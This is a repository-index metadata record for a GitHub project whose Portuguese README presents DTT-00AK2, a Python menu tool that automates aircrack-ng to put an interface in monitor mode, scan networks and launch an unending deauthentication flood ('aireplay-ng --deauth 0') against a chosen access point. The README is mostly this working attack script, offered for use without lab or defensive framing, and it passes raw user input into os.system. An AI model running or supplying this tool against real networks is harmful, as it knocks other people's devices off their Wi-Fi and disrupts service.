{"id":22363189,"url":"https://github.com/oanderoficial/dtt-00ak2","last_synced_at":"2025-03-26T15:18:00.610Z","repository":{"id":172861726,"uuid":"649884738","full_name":"oanderoficial/DTT-00AK2","owner":"oanderoficial","description":"Explorando uma vulnerabilidade na camada de autenticação e/ou gerenciamento de conexões do protocolo Wi-Fi (padrões IEEE 802.11). ","archived":false,"fork":false,"pushed_at":"2025-03-20T22:44:01.000Z","size":22,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-20T23:29:11.323Z","etag":null,"topics":["aircrack-ng","aircrack-ng-suite","deauthentication-attack","deauthentication-script","python","wireless"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/oanderoficial.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-06-05T21:17:21.000Z","updated_at":"2025-03-20T22:44:05.000Z","dependencies_parsed_at":"2025-03-20T23:35:44.411Z","dependency_job_id":null,"html_url":"https://github.com/oanderoficial/DTT-00AK2","commit_stats":null,"previous_names":["oanderoficial/dtt-00ak2"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oanderoficial%2FDTT-00AK2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oanderoficial%2FDTT-00AK2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oanderoficial%2FDTT-00AK2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oanderoficial%2FDTT-00AK2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/oanderoficial","download_url":"https://codeload.github.com/oanderoficial/DTT-00AK2/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245678901,"owners_count":20654738,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aircrack-ng","aircrack-ng-suite","deauthentication-attack","deauthentication-script","python","wireless"],"created_at":"2024-12-04T17:14:02.241Z","updated_at":"2025-03-26T15:18:00.603Z","avatar_url":"https://github.com/oanderoficial.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# DTT-00AK2\n\nAutomatizei com python alguns processos do aircrack-ng. DTT-00AK2 tem como foco realizar ataques de desautenticação em um ponto de acesso sem fio. Explorando uma vulnerabilidade na camada de autenticação e/ou gerenciamento de conexões do protocolo Wi-Fi (padrões IEEE 802.11). Qualquer dispositivo ou roteador que utilize o protocolo está sujeito ao ataque.\n\n```python\n\n             _..---..__\n           ,'          `-.\n          .'` .          )             DTT-00AK2\n          |     `;.__.._.'               V.1.1\n           \\ .`--.(##)(#).    Wi-Fi deauthentication attack \n            `--\u003e;--' pWq`\u003e              BY:AND3R\n              \u003c \u003c\"v\\,,,,]\n               `\\`^-''''7\n                 `~\"--^-'\n\n````\n\n```python\n\nimport os\n\nclass WifiAttackTool:\n    #colors\n    RED = '\\033[91m'\n    YELLOW = '\\033[93m'\n    GREEN = '\\033[92m'\n    RESET = '\\033[0m'\n\n    def __init__(self):\n        pass\n\n    def start_monitor_mode(self):\n        os.system(\"airmon-ng\")\n        interface = input(\"Digite aqui qual interface utilizar: \")\n        os.system(f\"airmon-ng start {interface}\")\n\n    def analyze_wifi_traffic(self):\n        interface = input(self.GREEN + \"Digite a interface: \" + self.RESET)\n        os.system(f'xterm -e airodump-ng \"{interface}\"')\n        os.system('clear')\n\n    def filter_results_by_bssid(self):\n        channel = input(self.GREEN + \"Digite o canal: \" + self.RESET)\n        bssid = input(self.GREEN + \"Digite a BSSID: \" + self.RESET)\n        interface = input(self.GREEN + \"Digite a interface: \" + self.RESET)\n        os.system('clear')\n        os.system(f'xterm -e airodump-ng -c {channel} --bssid {bssid} {interface}')\n        os.system('clear')\n\n    def perform_deauthentication_attack(self):\n        bssid = input(self.GREEN + \"Digite a BSSID: \" + self.RESET)\n        interface = input(self.GREEN + \"Digite a interface: \" + self.RESET)\n        os.system(f'xterm -e aireplay-ng --deauth 0 -a {bssid} {interface}')\n\n    def run(self):\n        while True:\n            print(self.RED + \"\"\"\n                     _..---..__\n                   ,'          `-.\n                  .'` .          )             DTT-00AK2\n                  |     `;.__.._.'               V.1.1\n                   \\ .`--.(##)(#).    Wi-Fi deauthentication attack \n                    `--\u003e;--' pWq`\u003e              BY:AND3R\n                      \u003c \u003c\"v\\,,,,]\n                       `\\`^-''''7\n                         `~\"--^-'\n            \"\"\" + self.RESET)\n            print(self.RED + \"1- [airmon-ng] Colocar a interface em modo monitor\" + self.RESET)\n            print(self.YELLOW + \"2- [airodump-ng] Analisar o tráfego de redes sem fio\" + self.RESET)\n            print(self.RED + \"3- [airodump-ng] Filtrar os resultados pelo BSSID\" + self.RESET)\n            print(self.YELLOW + \"4- [aireplay-ng] Realizar ataque no ponto de acesso (AP)\" + self.RESET)\n            print(self.RED + \"5- Sair\" + self.RESET)\n\n            menu = input(self.RED + \"Digite uma opção \u003e\u003e \" + self.RESET)\n\n            if menu == \"1\":\n                self.start_monitor_mode()\n            elif menu == \"2\":\n                self.analyze_wifi_traffic()\n            elif menu == \"3\":\n                self.filter_results_by_bssid()\n            elif menu == \"4\":\n                self.perform_deauthentication_attack()\n            elif menu == \"5\":\n                break\n            else:\n                print(\"Opção inválida\")\n\nif __name__ == \"__main__\":\n    tool = WifiAttackTool()\n    tool.run()\n\n\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foanderoficial%2Fdtt-00ak2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foanderoficial%2Fdtt-00ak2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foanderoficial%2Fdtt-00ak2/lists"}